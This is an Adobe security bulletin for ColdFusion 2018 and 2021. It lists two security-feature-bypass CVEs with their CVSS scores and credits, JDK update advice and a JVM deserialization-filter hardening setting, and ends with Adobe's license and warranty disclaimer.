ColdFusion 2018

Update 12

All

2

Tech note      

ColdFusion 2021  

Update 2  

All

2

Tech note

Adobe recommends updating your ColdFusion JDK/JRE to the latest version of the LTS releases for 1.8 and JDK 11. Applying the ColdFusion update without a corresponding JDK update will NOT secure the server.  See the relevant Tech Notes for more details. 

Adobe  also recommends customers apply the security configuration settings as outlined on the ColdFusion Security page as well as review the respective Lockdown guides.    

*   ColdFusion 2018 Auto-Lockdown guide   
*   ColdFusion 2021 Lockdown Guide

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVE Numbers**

Use of Inherently Dangerous Function

(CWE-242)

Security feature bypass    

Critical     

7.4  

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2021-40698  

Improper Access Control

(CWE-284)

Security feature bypass    

Critical     

7.4  

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

CVE-2021-40699  

**Acknowledgements**

Adobe would like to thank the following for reporting the relevant issues and for working with Adobe to help protect our customers:

*   Brian Reilly (CVE-2021-40699)
*   Rockwell, Edward J (CVE-2021-40698)  
    

**ColdFusion JDK Requirement**

**COLDFUSION 2021 (version 2021.0.0.323925) and above**

**For Application Servers**   

On JEE installations, set the following JVM flag, "-Djdk.serialFilter= !org.mozilla.\*\*;!com.sun.syndication.\*\*;!org.apache.commons.beanutils.\*\*", in the respective startup file depending on the type of Application Server being used.   

For example:   

Apache Tomcat Application Server: edit JAVA\_OPTS in the ‘Catalina.bat/sh’ file   

WebLogic Application Server:  edit JAVA\_OPTIONS in the ‘startWeblogic.cmd’ file   

WildFly/EAP Application Server:  edit JAVA\_OPTS in the ‘standalone.conf’ file   

Set the JVM flags on a JEE installation of ColdFusion, not on a standalone installation.   

**COLDFUSION 2018 HF1 and above**  

**For Application Servers**   

On JEE installations, set the following JVM flag, "-Djdk.serialFilter= !org.mozilla.\*\*;!com.sun.syndication.\*\*;!org.apache.commons.beanutils.\*\*", in the respective startup file depending on the type of Application Server being used.   

For example:   

Apache Tomcat Application Server: edit JAVA\_OPTS in the ‘Catalina.bat/sh’ file   

WebLogic Application Server:  edit JAVA\_OPTIONS in the ‘startWeblogic.cmd’ file   

WildFly/EAP Application Server:  edit JAVA\_OPTS in the ‘standalone.conf’ file   

Set the JVM flags on a JEE installation of ColdFusion, not on a standalone installation.   

**Adobe Disclaimer**

**License agreement**

By using software of Adobe Incorporated or its subsidiaries ("Adobe"); you agree to the following terms and conditions. If you do not agree with such terms and conditions; do not use the software. The terms of an end user license agreement accompanying a particular software file upon installation or download of the software shall supersede the terms presented below.

The export and re-export of Adobe software products are controlled by the United States Export Administration Regulations and such software may not be exported or re-exported to Cuba; Iran; North Korea; Syria and the Crimea region of Ukraine, or any country to which the United States embargoes goods. In addition; Adobe software may not be distributed to persons on the Table of Denial Orders; the Entity List; or the List of Specially Designated Nationals. 

By downloading or using an Adobe software product you are certifying that you are not a national of Cuba; Iran; North Korea; Syria, and the Crimea region of Ukraine, or any country to which the United States embargoes goods and that you are not a person on the Table of Denial Orders; the Entity List; or the List of Specially Designated Nationals. If the software is designed for use with an application software product (the "Host Application") published by Adobe; Adobe grants you a non-exclusive license to use such software with the Host Application only; provided you possess a valid license from Adobe for the Host Application. Except as set forth below; such software is licensed to you subject to the terms and conditions of the End User License Agreement from Adobe governing your use of the Host Application.

DISCLAIMER OF WARRANTIES: YOU AGREE THAT ADOBE HAS MADE NO EXPRESS WARRANTIES TO YOU REGARDING THE SOFTWARE AND THAT THE SOFTWARE IS BEING PROVIDED TO YOU "AS IS" WITHOUT WARRANTY OF ANY KIND. ADOBE DISCLAIMS ALL WARRANTIES WITH REGARD TO THE SOFTWARE; EXPRESS OR IMPLIED; INCLUDING; WITHOUT LIMITATION; ANY IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE; MERCHANTABILITY; MERCHANTABLE QUALITY OR NONINFRINGEMENT OF THIRD PARTY RIGHTS. Some states or jurisdictions do not allow the exclusion of implied warranties; so the above limitations may not apply to you.

LIMIT OF LIABILITY: IN NO EVENT WILL ADOBE BE LIABLE TO YOU FOR ANY LOSS OF USE; INTERRUPTION OF BUSINESS; OR ANY DIRECT; INDIRECT; SPECIAL; INCIDENTAL; OR CONSEQUENTIAL DAMAGES OF ANY KIND (INCLUDING LOST PROFITS) REGARDLESS OF THE FORM OF ACTION WHETHER IN CONTRACT; TORT (INCLUDING NEGLIGENCE); STRICT PRODUCT LIABILITY OR OTHERWISE; EVEN IF ADOBE HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. Some states or jurisdictions do not allow the exclusion or limitation of incidental or consequential damages; so the above limitation or exclusion may not apply to you.

For more information, visit https://helpx.adobe.com/security.html , or email PSIRT@adobe.com

Tag

#web